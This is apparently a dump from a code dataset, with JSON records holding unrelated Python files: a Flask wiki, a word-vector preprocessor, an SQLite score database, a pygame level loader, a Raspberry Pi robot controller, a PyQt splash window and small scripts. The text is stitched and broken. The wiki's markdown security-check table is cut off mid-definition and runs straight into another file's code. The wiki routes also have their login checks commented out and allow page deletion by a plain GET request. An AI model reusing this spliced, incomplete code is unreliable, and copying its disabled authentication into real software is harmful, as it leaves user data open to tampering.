hour\n if d_sec > 60 * 10: # 10 minutes\n return False\n else:\n return True\n\n\n # Wiki Help Page\n @app.route(URL_PREFIX_WIKI_WEB + '/help/')\n ##@index_utils.login_required\n def wiki_help():\n txt = index_utils.file_read_local_md('napkin/templates/wiki/example.md')\n\n txthtml = wk_markdown_to_html(txt)\n #return flask.Response(nodes.to_json(),\n # mimetype='application/json')\n return flask.render_template('wiki/help.html', txthtml=txthtml)\n\n\n # Wiki Result Page\n @app.route(URL_PREFIX_WIKI_WEB + '/result/', methods=['GET', 'POST'])\n ##@index_utils.login_required\n def wiki_result():\n if flask.request.method == 'GET':\n args = index_utils.flask_req_get_querystr(flask.request)\n else:\n args = index_utils.flask_req_get_post_data(flask.request)\n\n result_txt = args.get('result', '')\n\n return flask.render_template('wiki/result.html', result_txt=result_txt)\n\n\n # Wiki List Page\n @app.route(URL_PREFIX_WIKI_WEB + '/list/')\n ##@index_utils.login_required\n def wiki_list_all():\n #pgs = db_api.wiki_page_get_all()\n #pgs = db_api.wiki_page_filter(level=1)\n pgs = db_api.wiki_page_filter(level=0).order_by('-created_at')\n return flask.render_template('wiki/list.html', pgs=pgs)\n\n # Wiki Index Page\n @app.route(URL_PREFIX_WIKI_WEB + '/')\n ##@index_utils.login_required\n def wiki_index():\n #pgs = db_api.wiki_page_get_all()\n pgs = db_api.wiki_page_filter(level=1).order_by('created_at')\n return flask.render_template('wiki/index.html', pgs=pgs)\n\n\n # Wiki Single Page\n @app.route(URL_PREFIX_WIKI_WEB + '/page/')\n ##@index_utils.login_required\n def wiki_page(pgid=None):\n if not pgid:\n return flask.redirect(flask.url_for('wiki_index'))\n\n try:\n pg = db_api.wiki_page_get(pgid)\n except:\n return flask.redirect(flask.url_for('wiki_index'))\n content = pg.content # TODO(likun):\n txthtml = wk_markdown_to_html(content)\n title = pg.title\n updated_at = pg.updated_at\n state = pg.state\n\n locked = wiki_util_page_check_lock(pg)\n return flask.render_template('wiki/page.html', title=title,\n txthtml=txthtml, pgid=pgid,\n updated_at=updated_at, state=state,\n locked=locked)\n\n\n # Wiki Post Page\n @app.route(URL_PREFIX_WIKI_WEB + '/post/')\n ##@index_utils.login_required\n def wiki_post():\n return flask.render_template('wiki/post.html')\n\n\n # Wiki Edit Page\n @app.route(URL_PREFIX_WIKI_WEB + '/edit/')\n ##@index_utils.login_required\n def wiki_edit(pgid=None):\n if not pgid:\n return flask.redirect(flask.url_for('/'))\n\n try:\n pg = db_api.wiki_page_get(pgid)\n except:\n return flask.redirect(flask.url_for('wiki_index'))\n\n pgid = str(pg.id)\n\n locked = wiki_util_page_check_lock(pg)\n if locked:\n return flask.redirect('/wiki/page/' + pgid)\n\n content = pg.content # TODO(likun):\n title = pg.title\n keywords = pg.keywords\n #if keywords:\n # keywords = ' '.join(keywords)\n #else:\n # keywords = ''\n if isinstance(keywords, (list, tuple, set)):\n keywords = ' '.join(keywords)\n level = pg.level\n updated_at = pg.updated_at\n\n # lock the page\n pg.state = 'lock'\n pg.locked_at = datetime.datetime.now()\n pg.save()\n\n return flask.render_template('wiki/edit.html', pgid=pgid,\n content=content, title=title,\n keywords=keywords, level=level,\n updated_at=updated_at)\n\n\n # Wiki Post API\n @app.route(URL_PREFIX_WIKI_WEB + '/api/post', methods=['POST'])\n ##@index_utils.login_required\n def wiki_api_post():\n if flask.request.method == 'GET':\n args = index_utils.flask_req_get_querystr(flask.request)\n else:\n args = index_utils.flask_req_get_post_data(flask.request)\n\n pgid = args.get('pageid')\n\n page_title = args.get('page_title', '')\n page_content = args.get('page_content', '')\n page_keywords = args.get('page_keywords', '') # []\n page_level = args.get('page_level', 0)\n\n #if isinstance(page_keywords, (str, unicode)):\n # page_keywords = index_utils.str_to_list_by(page_keywords)\n\n try:\n\n if pgid: # edit\n pg = db_api.wiki_page_get(pgid)\n\n # TODO(likun):\n #locked = wiki_util_page_check_lock(pg)\n #if locked:\n # return flask.redirect('/wiki/page/' + pgid)\n\n #pg.version += 1\n\n #pg.title = page_title\n #pg.content = page_content\n #pg.keywords = page_keywords\n\n pg_d = {}\n pg_d['version'] = pg.version + 1\n pg_d['title'] = page_title\n pg_d['content'] = page_content\n pg_d['keywords'] = page_keywords\n pg_d['level'] = page_level\n pg_d['updated_at'] = datetime.datetime.now()\n pg_d['state'] = 'open'\n #pg_d['locked_at'] = datetime.datetime.now()\n\n db_api.wiki_page_update(pgid, pg_d)\n else:\n pg_d = {}\n pg_d['title'] = page_title\n pg_d['content'] = page_content\n pg_d['keywords'] = page_keywords\n pg_d['level'] = page_level\n pg_d['state'] = 'open'\n #pg_d['locked_at'] = datetime.datetime.now()\n\n username = flask.session.get('username', 'author_name')\n pg_d['author_name'] = username # TODO:\n \n pg_o = db_api.wiki_page_create(pg_d)\n\n pgid = str(pg_o.id)\n\n #return flask.Response(json.dumps(pg_d),\n # mimetype='application/json')\n #return flask.Response(pgid)\n return flask.redirect('/wiki/page/' + pgid)\n except Exception as ex:\n flask.abort(400, repr(ex))\n\n\n # Wiki Delete Page\n @app.route(URL_PREFIX_WIKI_WEB + '/api/del/')\n ##@index_utils.login_required\n def wiki_api_del(pgid=None):\n if not pgid:\n return flask.redirect(flask.url_for('/'))\n\n try:\n pg = db_api.wiki_page_get(pgid)\n pg.delete()\n return flask.redirect(flask.url_for('wiki_index'))\n except:\n return flask.redirect(flask.url_for('wiki_index'))\n\n\n\n\n # return the application at the end\n return app\n\n\n# markdown functions #\n\n# http://pythonhosted.org/Markdown/reference.html\n\n# http://pythonhosted.org/Markdown/extensions/index.html\n# Officially Supported Extensions\n\n'''\nExtension Name\nExtra markdown.extensions.extra\n Abbreviations markdown.extensions.abbr\n Attribute Lists markdown.extensions.attr_list\n Definition Lists markdown.extensions.def_list\n Fenced Code Blocks markdown.extensions.fenced_code\n Footnotes markdown.extensions.footnotes\n Tables markdown.extensions.tables\n Smart Strong markdown.extensions.smart_strong\nAdmonition markdown.extensions.admonition\nCodeHilite markdown.extensions.codehilite\nHeaderId markdown.extensions.headerid\nMeta-Data markdown.extensions.meta\nNew Line to Break markdown.extensions.nl2br\nSane Lists markdown.extensions.sane_lists\nSmartyPants markdown.extensions.smarty\nTable of Contents markdown.extensions.toc\nWikiLinks markdown.extensions.wikilinks\n'''\n\nWK_MARKDOWN_EXTENSIONS = [\n 'markdown.extensions.extra',\n 'markdown.extensions.abbr',\n 'markdown.extensions.attr_list',\n 'markdown.extensions.def_list',\n 'markdown.extensions.fenced_code',\n 'markdown.extensions.footnotes',\n 'markdown.extensions.tables',\n 'markdown.extensions.smart_strong',\n 'markdown.extensions.admonition',\n 'markdown.extensions.codehilite',\n 'markdown.extensions.headerid',\n 'markdown.extensions.meta',\n 'markdown.extensions.nl2br',\n 'markdown.extensions.sane_lists',\n 'markdown.extensions.smarty',\n 'markdown.extensions.toc',\n 'markdown.extensions.wikilinks',\n]\n\n\ndef wk_markdown_to_html(txt, *args, **kwargs):\n html = markdown.markdown(txt, extensions=WK_MARKDOWN_EXTENSIONS)\n html = wk_markdown_security_check(html)\n return html\n\n\nWK_MARKDOWN_SEC_CHECKS = {\n '\\n').encode('utf-8'))\n proc_ft.stdin.flush()\n is_eol = False\n word_list = []\n vect_list = np.empty([0, 300])\n while not is_eol:\n l = proc_ft.stdout.readline().decode(\"utf-8\")\n l = l.strip(' \\t\\n\\r')\n is_eol = l.startswith('<%EOL%>')\n if not is_eol:\n lsplit = l.split(\" \")\n word_list.append(lsplit[0])\n snp = np.array(lsplit[1:])\n fnp = snp.astype(np.float)\n vect_list = np.vstack((vect_list, fnp))\n print(word_list)\n return word_list, vect_list\n\n\ndef main(argv=None):\n x, y = preprocess()\n print(\"Counts: x(rows, seg_max, embed_sz)=%s; y(rows, cols)=%s;\"%(x.shape, y.shape))\n np.savez(FLAGS.data_file, x=x, y=y)\n\n\nif __name__ == '__main__':\n tf.app.run()","sub_path":"vocab_process_ft.py","file_name":"vocab_process_ft.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"454017985","text":"#!/usr/bin/env python3\n\nimport warnings\nimport sqlite3\nimport random\nimport datetime\nimport re\nimport collections\nimport shutil\nimport os\n\nimport util\nimport settings\nimport leaderboard\n\nclass getCur():\n con = None\n cur = None\n def __enter__(self):\n self.con = sqlite3.connect(settings.DBFILE)\n self.cur = self.con.cursor()\n self.cur.execute(\"PRAGMA foreign_keys = 1;\")\n return self.cur\n def __exit__(self, type, value, traceback):\n if self.cur and self.con and not value:\n self.cur.close()\n self.con.commit()\n self.con.close()\n\n return False\n\nschema = collections.OrderedDict({\n 'Players': [\n 'Id INTEGER PRIMARY KEY AUTOINCREMENT',\n 'Name TEXT',\n 'MeetupName TEXT'\n ],\n 'Scores': [\n 'Id INTEGER PRIMARY KEY AUTOINCREMENT',\n 'GameId INTEGER',\n 'PlayerId INTEGER',\n 'Rank TINYINT',\n 'PlayerCount TINYINT',\n 'RawScore INTEGER',\n 'Score REAL',\n 'Date DATE',\n 'Chombos INTEGER',\n 'Quarter TEXT',\n 'FOREIGN KEY(PlayerId) REFERENCES Players(Id) ON DELETE CASCADE'\n ],\n 'CurrentPlayers': [\n 'PlayerId INTEGER PRIMARY KEY',\n 'Priority TINYINT',\n 'FOREIGN KEY(PlayerId) REFERENCES Players(Id) ON DELETE CASCADE'\n ],\n 'CurrentTables': [\n 'Id INTEGER PRIMARY KEY AUTOINCREMENT',\n 'PlayerId INTEGER',\n 'FOREIGN KEY(PlayerId) REFERENCES Players(Id) ON DELETE CASCADE'\n ],\n 'Users': [\n 'Id INTEGER PRIMARY KEY AUTOINCREMENT',\n 'Email TEXT NOT NULL',\n 'Password TEXT NOT NULL',\n 'UNIQUE(Email)'\n ],\n 'Admins': [\n 'Id INTEGER PRIMARY KEY NOT NULL',\n 'FOREIGN KEY(Id) REFERENCES Users(Id) ON DELETE CASCADE'\n ],\n 'ResetLinks': [\n 'Id CHAR(32) PRIMARY KEY NOT NULL',\n 'User INTEGER',\n 'Expires DATETIME',\n 'FOREIGN KEY(User) REFERENCES Users(Id)'\n ],\n 'VerifyLinks': [\n 'Id CHAR(32) PRIMARY KEY NOT NULL',\n 'Email TEXT NOT NULL',\n 'Expires DATETIME'\n ],\n 'Quarters': [\n 'Quarter TEXT PRIMARY KEY NOT NULL',\n 'GameCount INTEGER NOT NULL',\n 'UnusedPointsIncrement INTEGER DEFAULT 0'\n ],\n 'Settings': [\n 'UserId INTEGER',\n 'Setting TEXT NOT NULL',\n 'Value SETTING NOT NULL',\n 'FOREIGN KEY(UserId) REFERENCES Users(Id)'\n ],\n 'Timers': [\n 'Id INTEGER PRIMARY KEY',\n 'Name TEXT',\n 'Duration INTEGER',\n 'Time DATETIME'\n ]\n})\n\ndef init(force=False):\n warnings.filterwarnings('ignore', r'Table \\'[^\\']*\\' already exists')\n\n global schema\n independent_tables = []\n dependent_tables = []\n for table in schema:\n if len(parent_tables(schema[table])) == 0:\n independent_tables.append(table)\n else:\n dependent_tables.append(table)\n\n to_check = collections.deque(independent_tables + dependent_tables)\n checked = set()\n max_count = len(independent_tables) + len(dependent_tables) ** 2 / 2\n count = 0\n while count < max_count and len(to_check) > 0:\n table = to_check.popleft()\n # If this table's parents haven't been checked yet, defer it\n if set(parent_tables(table)) - checked:\n to_check.append(table)\n else:\n check_table_schema(table, force=force)\n checked.add(table)\n count += 1\n\ndef make_backup():\n backupdb = datetime.datetime.now().strftime(settings.DBDATEFORMAT) + \"-\" + os.path.split(settings.DBFILE)[1]\n backupdb = os.path.join(settings.DBBACKUPS, backupdb)\n print(\"Making backup of database {0} to {1}\".format(settings.DBFILE, backupdb))\n if not os.path.isdir(settings.DBBACKUPS):\n os.mkdir(settings.DBBACKUPS)\n shutil.copyfile(settings.DBFILE, backupdb)\n\nfkey_pattern = re.compile(\n r'.*FOREIGN\\s+KEY\\s*\\((\\w+)\\)\\s*REFERENCES\\s+(\\w+)\\s*\\((\\w+)\\).*',\n re.IGNORECASE)\n\ndef parent_tables(table_spec):\n global fkey_pattern\n parents = []\n for spec in table_spec:\n match = fkey_pattern.match(spec)\n if match:\n parents.append(match.group(2))\n return parents\n\ndef check_table_schema(tablename, force=False, backupname=\"_backup\"):\n \"\"\"Compare existing table schema with that specified in schema above\n and make corrections as needed. This checks for new tables, new\n fields, new (foreign key) constraints, and altered field specificaitons.\n For schema changes beyond just adding fields, it renames the old table\n to a \"backup\" table, and then copies its content into a freshly built\n new version of the table.\n For really complex schema changs, move the old database aside and\n either build from scratch or manually alter it.\n \"\"\"\n table_fields = schema[tablename]\n with getCur() as cur:\n cur.execute(\"PRAGMA table_info('{0}')\".format(tablename))\n actual_fields = cur.fetchall()\n cur.execute(\"PRAGMA foreign_key_list('{0}')\".format(tablename))\n actual_fkeys = cur.fetchall()\n if len(actual_fields) == 0:\n cur.execute(\"CREATE TABLE IF NOT EXISTS {0} ({1});\".format(\n tablename, \", \".join(table_fields)))\n else:\n fields_to_add = missing_fields(table_fields, actual_fields)\n fkeys_to_add = missing_constraints(table_fields, actual_fkeys)\n altered = altered_fields(table_fields, actual_fields)\n deleted = deleted_fields(table_fields, actual_fields)\n if (len(fields_to_add) > 0 and len(fkeys_to_add) == 0 and\n len(altered) == 0):\n # Only new fields to add\n if force or util.prompt(\n \"SCHEMA CHANGE: Add {0} to table {1}\".format(\n \", \".join(fields_to_add), tablename)):\n for field_spec in fields_to_add:\n cur.execute(\"ALTER TABLE {0} ADD COLUMN {1};\".format(\n tablename, field_spec))\n elif len(fkeys_to_add) > 0 or len(altered) > 0:\n # Fields have changed significantly; try copying old into new\n if force or util.prompt(\n (\"SCHEMA CHANGE: Backup and recreate table {0} \"\n \"to add {1}, impose {2}, correct {3}, and delete {4}))\").format(\n tablename, fields_to_add, fkeys_to_add,\n altered)):\n make_backup()\n backup = tablename + backupname\n sql = \"ALTER TABLE {0} RENAME TO {1};\".format(\n tablename, backup)\n cur.execute(sql)\n sql = \"CREATE TABLE {0} ({1});\".format(\n tablename, \", \".join(table_fields))\n cur.execute(sql)\n # Copy all actual fields that have a corresponding field\n # in the new schema\n common_fields = [\n f[1] for f in actual_fields if\n find_field_spec_for_pragma(table_fields, f)]\n sql = \"INSERT INTO {0} ({1}) SELECT {1} FROM {2};\".format(\n tablename, \", \".join(common_fields), backup)\n cur.execute(sql)\n sql = \"DROP TABLE {0};\".format(backup)\n cur.execute(sql)\n\ndef words(spec):\n return re.findall(r'\\w+', spec)\n\ndef missing_fields(table_fields, actual_fields):\n return [ field_spec for field_spec in table_fields if (\n words(field_spec)[0].upper() not in [\n 'FOREIGN', 'CONSTRAINT', 'PRIMARY', 'UNIQUE', 'NOT',\n 'CHECK', 'DEFAULT', 'COLLATE'] + [\n x[1].upper() for x in actual_fields]) ]\n\ndef missing_constraints(table_fields, actual_fkeys):\n return [ field_spec for field_spec in table_fields if (\n words(field_spec)[0].upper() in ['FOREIGN', 'CONSTRAINT'] and\n 'REFERENCES' in [ w.upper() for w in words(field_spec) ] and\n not any(map(lambda fkey: match_constraint(field_spec, fkey),\n actual_fkeys))) ]\n\ndef match_constraint(field_spec, fkey_record):\n global fkey_pattern\n match = fkey_pattern.match(field_spec)\n return (match and\n match.group(1).upper() == fkey_record[3].upper() and\n match.group(2).upper() == fkey_record[2].upper() and\n match.group(3).upper() == fkey_record[4].upper())\n\nsqlite_pragma_columns = [\n 'column_ID', 'name', 'type', 'notnull', 'default', 'pk_member'\n]\n\ndef altered_fields(table_fields, actual_fields):\n altered = []\n for actual in actual_fields:\n matching_spec = find_field_spec_for_pragma(table_fields, actual)\n if matching_spec and not field_spec_matches_pragma(matching_spec, actual):\n altered.append(matching_spec)\n return altered\n\ndef deleted_fields(table_fields, actual_fields):\n deleted = []\n for actual in actual_fields:\n matching_spec = find_field_spec_for_pragma(table_fields, actual)\n if not matching_spec:\n deleted.append(actual[1] + ' ' + actual[2])\n return deleted\n\ndef find_field_spec_for_pragma(table_fields, pragma_rec):\n for field in table_fields:\n if words(field)[0].upper() == pragma_rec[1].upper():\n return field\n return None\n\ndef field_spec_matches_pragma(field_spec, pragma_rec):\n global sqlite_pragma_columns\n if field_spec is None or pragma_rec is None:\n return False\n field = dict(zip(\n sqlite_pragma_columns,\n [x.upper() if isinstance(x, str) else x for x in pragma_rec]))\n spec = words(field_spec.upper())\n return (spec[0] == field['name'] and\n all([w in spec for w in words(field['type'])]) and\n (field['notnull'] == 0 or ('NOT' in spec and 'NULL' in spec)) and\n (field['default'] is None or\n ('DEFAULT' in spec and str(field['default']) in spec)) and\n (field['pk_member'] == (\n 1 if 'PRIMARY' in spec and 'KEY' in spec else 0))\n )\n\ndef quarterString(time=None):\n \"\"\"Return the string for the calendar quarter for the given datetime object.\n Time defaults to current time\"\"\"\n if time is None:\n time = datetime.datetime.now()\n return time.strftime(\"%Y \") + [\"1st\", \"2nd\", \"3rd\", \"4th\"][\n (time.month - 1) // 3]\n\ndef unusedPointsIncrement(quarter=None):\n \"\"\"Get the UnusedPointsIncrement value for the given quarter.\n The quarter defaults to the most recent quarter in the database\n (but no later than today's date).\"\"\"\n if quarter is None:\n quarter = quarterString()\n try:\n with getCur() as cur:\n cur.execute(\"SELECT COALESCE(UnusedPointsIncrement,0) FROM Quarters\"\n \" WHERE Quarter <= ? ORDER BY Quarter DESC\"\n \" LIMIT 1\",\n (quarter,))\n increment = cur.fetchone()[0]\n except:\n increment = 0\n return increment\n\n_unusedPointsPlayer = None\nunusedPointsPlayerName = '!#*UnusedPointsPlayer*#!'\n\ndef getUnusedPointsPlayerID():\n \"\"\" Get the ID of the Players table entry that records unused points in\n games. If an entry doesn't exist, create one.\"\"\"\n global _unusedPointsPlayer, unusedPointsPlayerName\n if _unusedPointsPlayer:\n return _unusedPointsPlayer\n with getCur() as cur:\n cur.execute(\"SELECT Id from Players WHERE Name = ? AND\"\n \" MeetupName IS NULL\",\n (unusedPointsPlayerName,))\n result = cur.fetchall()\n if len(result) > 1:\n raise Exception(\"More than 1 player defined for unused points\")\n elif len(result) == 1:\n _unusedPointsPlayer = result[0][0]\n else:\n cur.execute(\"INSERT INTO Players (Name, MeetupName) VALUES (?, NULL)\",\n (unusedPointsPlayerName,))\n _unusedPointsPlayer = cur.lastrowid\n return _unusedPointsPlayer\n\ndateFormat = \"%Y-%m-%d\"\n\ndef addGame(scores, gamedate = None, gameid = None):\n \"\"\"Add raw scores for a particular game to the database.\n The scores should be a list of dictionaries.\n Each dictionary should have a 'player' name or ID, a raw 'score', and\n a 'chombos' count.\n One of the players may be the UnusedPointsPlayer to represent points\n that were not claimed at the end of play.\n The gamedate defaults to today. A new gameid is created if none is given.\n If a player name is not found in database, a new record is created for\n them.\n \"\"\"\n global dateFormat, unusedPointsPlayerName\n if gamedate is None:\n gamedate = datetime.datetime.now().strftime(dateFormat)\n quarter = quarterString()\n else:\n quarter = quarterString(datetime.datetime.strptime(gamedate, dateFormat))\n\n if scores is None:\n return {\"status\":1, \"error\":\"Please enter some scores\"}\n\n hasUnusedPoints = False\n unusedPoints = 0\n unusedPointsPlayerID = getUnusedPointsPlayerID()\n total = 0\n uniqueIDs = set()\n pointHistogram = {}\n for score in scores:\n uniqueIDs.add(score['player'])\n total += score['score']\n score['points'] = score['score'] - (\n settings.CHOMBOPENALTY * score['chombos'] * 1000)\n if score['player'] in (\n -1, unusedPointsPlayerID, unusedPointsPlayerName):\n score['player'] = unusedPointsPlayerID\n hasUnusedPoints = True\n unusedPoints = score['score']\n else:\n pointHistogram[score['points']] = (\n pointHistogram.get(score['points'], 0) + 1)\n\n realPlayerCount = len(scores) - (1 if hasUnusedPoints else 0)\n\n if not (4 <= realPlayerCount and realPlayerCount <= 5):\n return {\"status\":1, \"error\":\"Please enter 4 or 5 scores\"}\n\n if hasUnusedPoints and unusedPoints % unusedPointsIncrement() != 0:\n return {\"status\":1,\n \"error\":\"Unused points must be a multiple of {0}\".format(\n unusedPointsIncrement())}\n\n if \"\" in uniqueIDs:\n return {\"status\":1, \"error\":\"Please enter all player names\"}\n\n if len(uniqueIDs) < len(scores):\n return {\"status\":1, \"error\": \"All players must be distinct\"}\n\n targetTotal = realPlayerCount * settings.SCOREPERPLAYER\n if total != targetTotal:\n return {\"status\": 1,\n \"error\": \"Scores do not add up to \" + str(targetTotal)}\n\n # Sort scores for ranking, ensuring unused points player is last, if present\n scores.sort(\n key=lambda x: (x['player'] != unusedPointsPlayerID, x['points']),\n reverse=True)\n\n with getCur() as cur:\n if gameid is None:\n cur.execute(\"SELECT GameId FROM Scores ORDER BY GameId DESC LIMIT 1\")\n row = cur.fetchone()\n if row is not None:\n gameid = row[0] + 1\n else:\n gameid = 0\n else:\n cur.execute(\"DELETE FROM Scores WHERE GameId = ?\", (gameid,))\n\n umas = {4:[15,5,-5,-15],\n 5:[15,5,0,-5,-15]}\n rank = 1\n pointHistogram[None] = 0\n last_points = None\n for i in range(len(scores)):\n score = scores[i]\n if score['points'] != last_points:\n rank += pointHistogram[last_points]\n last_points = score['points']\n score['rank'] = rank\n uma = 0\n if score['player'] != unusedPointsPlayerID:\n for j in range(rank-1, rank-1 + pointHistogram[last_points]):\n uma += umas[realPlayerCount][j]\n uma /= pointHistogram[last_points]\n cur.execute(\"SELECT Id FROM Players WHERE Id = ? OR Name = ?\",\n (score['player'], score['player']))\n player = cur.fetchone()\n if player is None or len(player) == 0:\n cur.execute(\"INSERT INTO Players(Name) VALUES(?)\",\n (score['player'],))\n cur.execute(\"SELECT Id FROM Players WHERE Name = ?\",\n (score['player'],))\n player = cur.fetchone()\n player = player[0]\n\n adjscore = 0 if score['player'] == unusedPointsPlayerID else (\n (score['points'] - settings.SCOREPERPLAYER) / 1000.0 + uma)\n\n cur.execute(\n \"INSERT INTO Scores(GameId, PlayerId, Rank, PlayerCount, \"\n \" RawScore, Chombos, Score, Date, Quarter) \"\n \" VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)\",\n (gameid, player, score['rank'], len(scores),\n score['score'], score['chombos'], adjscore, gamedate, quarter))\n\n leaderboard.clearCache()\n return {\"status\":0}\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":16778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"453755340","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 03 16:14:55 2015\n\n@author: Flavian\n\"\"\"\n\nimport pygame\nfrom graphics import Graphics\nfrom pygame.locals import *\n\nclass Level:\n \n def __init__(self, art, level):\n self.art = art\n self.tiles = [[0 for j in range(30)] for i in range(40)]\n self.preload()\n self.load(level)\n \n def preload(self):\n self.black_tile = pygame.Surface((10, 10))\n g = Graphics(self.black_tile)\n g.setColor((0, 0, 0))\n g.fillRect(0, 0, 10, 10)\n \n def load(self, level):\n img = self.art.levels[level]\n pxarray = pygame.PixelArray(img.getSurface())\n for iX in range(0, 40):\n for iY in range(0, 30):\n c = pygame.Color(pxarray[iX, iY])\n alpha = c.r\n red = c.g\n green = c.b\n blue = c.a\n if red == 0 and green == 0 and blue == 0:\n self.tiles[iX][iY] = 0\n elif red == 255 and green == 255 and blue == 255:\n self.tiles[iX][iY] = 1\n elif red == 255 and green == 216 and blue == 0:\n print(\"Player spawn\")\n else:\n print(\"Unknow color (R:{0}, G:{1}, B:{2}, A:{3})\".format(red, green, blue, alpha))\n \n def tick(self, input_handler):\n i=0\n \n def render(self, g):\n for iX in range(0, 40):\n for iY in range(0, 30):\n tile = self.tiles[iX][iY]\n if tile == 0:\n g.drawImage(self.black_tile, iX * 10, iY * 10)\n elif tile == 1:\n g.drawImage(self.art.tiles[1][0].getSurface(), iX * 10, iY * 10)","sub_path":"Client/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"207928428","text":"import motors as m\n#import bump as b\nimport RPi.GPIO as GPIO\nimport time\n\nimport signal\n\ndef interrupted(signum, frame):\n print ('asdf')\nsignal.signal(signal.SIGALRM, interrupted)\n\ndef input():\n try:\n foo = raw_input()\n return foo\n except:\n return\n\nsignal.alarm(5)\ns = input()\nsignal.alarm(0)\n\nbump_sensor1 = 17\nbump_sensor2 = 4\nbump_sensor3 = 27\nbump_sensor4 = 22\n\nGPIO.setup(bump_sensor1, GPIO.IN, GPIO.PUD_DOWN)\nGPIO.setup(bump_sensor2, GPIO.IN, GPIO.PUD_DOWN)\nGPIO.setup(bump_sensor3, GPIO.IN, GPIO.PUD_DOWN)\nGPIO.setup(bump_sensor4, GPIO.IN, GPIO.PUD_DOWN)\n\ndef my_callback(bump_sensor1):\n m.stop()\n\nGPIO.add_event_detect(bump_sensor1, GPIO.RISING, callback=my_callback)\nGPIO.add_event_detect(bump_sensor2, GPIO.RISING, callback=my_callback)\nGPIO.add_event_detect(bump_sensor3, GPIO.RISING, callback=my_callback)\nGPIO.add_event_detect(bump_sensor4, GPIO.RISING, callback=my_callback)\n\nwhile (1):\n x = input() \n\n if x=='w':\n m.forward()\n elif x=='a':\n m.left_turn()\n time.sleep(0.1)\n m.stop()\n elif x=='aa':\n m.left_turn()\n time.sleep(0.4)\n m.stop()\n elif x=='d':\n m.right_turn()\n time.sleep(0.1)\n m.stop()\n elif x=='dd':\n m.right_turn()\n time.sleep(0.4)\n m.stop()\n elif x=='ss':\n m.reverse()\n elif x=='s':\n m.stop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"33762354","text":"#-*- coding:utf-8 -*-\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtNetwork import *\nfrom uievents.awindowbase import *\nfrom uidefines.Ui_SplashWindow import *\nfrom uiutil.envs import *\nfrom uiutil.globaltool import *\nimport os\nimport sys\nimport pathlib\nimport datetime\n\n'''\n 这是SplashWindow窗体的实现类\n'''\n#class FSplashWindow(IWindowImpl):\nclass FSplashWindow(IWindowImplM):\n '''\n 初始化所有数据(抽象函数)\n '''\n def initUIAndData(self):\n #初始化事件\n self.initEvents()\n #初始化投递线程\n self.msgWorker = QTInvokeQueueWorkerWithProcess(self)\n self.msgWorker.start()\n\n '''\n 初始化事件\n '''\n def initEvents(self):\n pass\n\n '''\n 返回UI定义类的实例(例如uiDefines/Ui_MainWindow.py的实例,抽象函数)\n '''\n def getUIDefineObject(self):\n return Ui_SplashWindow()\n\n '''\n InvokeUI的实现(用于跨线程操作UI内容)\n '''\n def runUIImpl(self, uiArgs):\n self.uiObj.lblContent.setText(uiArgs.contentVal)\n self.uiObj.pbProgress.setValue(uiArgs.progressVal)\n\n '''\n 显示窗体\n '''\n def showWindow(title, doWorkImpl):\n if doWorkImpl != None and title != None:\n #显示窗体\n windowObj, ui, event = WindowBuilder.buildWindow(None, FSplashWindow())\n windowObj.setWindowTitle(title)\n doWorkImpl.windowObj = windowObj\n doWorkImpl.eventObj = event\n windowObj.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)\n windowObj.setFixedSize(windowObj.width(), windowObj.height())\n windowObj.show()\n #运行线程\n thread = threading.Thread(target=doWorkImpl.process)\n thread.start()\n\n'''\n Splash处理类\n'''\nclass ISplashDoWork:\n '''\n 处理数据\n '''\n def process(self):\n raise NotImplementedError\n\n'''\n Splash的Invoke参数\n'''\nclass SplashInvokeArgs(QTInvokeArgs):\n def __init__(self, progress, content):\n super().__init__()\n self.progressVal = progress\n self.contentVal = content\n","sub_path":"uievents/eventsplashwindow.py","file_name":"eventsplashwindow.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"164176637","text":"import sys\nimport math\nimport re\nfrom typing import *\n\ninput = sys.stdin.readline\n\nsys.setrecursionlimit(10**6)\n\n\nN = int(input())\ndata = [int(input()) for _ in range(N)]\ndata.sort()\nmpoint = 0\nwhile mpoint < len(data) and data[mpoint] <= 0:\n mpoint += 1\n\nmArr = data[:mpoint]\npArr = data[mpoint:]\nans = 0\nwhile mArr:\n if len(mArr) >= 2:\n ans += (mArr[0]*mArr[1])\n mArr = mArr[2:]\n elif len(mArr) == 1:\n ans += mArr[0]\n mArr = mArr[1:]\n else:\n print(\"Error\")\npArr = pArr[::-1]\nwhile pArr:\n if len(pArr) >= 2:\n if pArr[0] == 1 or pArr[1] == 1:\n ans += (pArr[0]+pArr[1])\n else:\n ans += (pArr[0]*pArr[1])\n pArr = pArr[2:]\n elif len(pArr) == 1:\n ans += pArr[0]\n pArr = pArr[1:]\n else:\n print(\"Error\")\nprint(ans)\n\"\"\"\n4\n-1\n2\n1\n3\n\n4\n1\n2\n1\n3\n\n4\n-1\n-2\n-1\n-3\n\n6\n0\n-1\n-2\n-3\n4\n5\n\"\"\"\n","sub_path":"BOJ_Gold/1744.py","file_name":"1744.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"574202016","text":"import os, pp\n\ninput_list = [4, 3, 8, 6, 10]\nresult_dict = {}\n\n\ndef fibo_task(value):\n a, b = 0, 1\n for item in range(value):\n a, b = b, a + b\n message = \"Fibbonachi calculeted by pip %d was %d\" % (os.getpid(), a)\n return (value, message)\n\n\ndef aggregate_resut(result):\n print(\"Done result with PIP [%d]\" % os.getpid())\n result_dict[result[0]] = result[1]\n\n\njob_server = pp.Server()\n\nfor item in input_list:\n job_server.submit(fibo_task, (item,), modules=('os',), 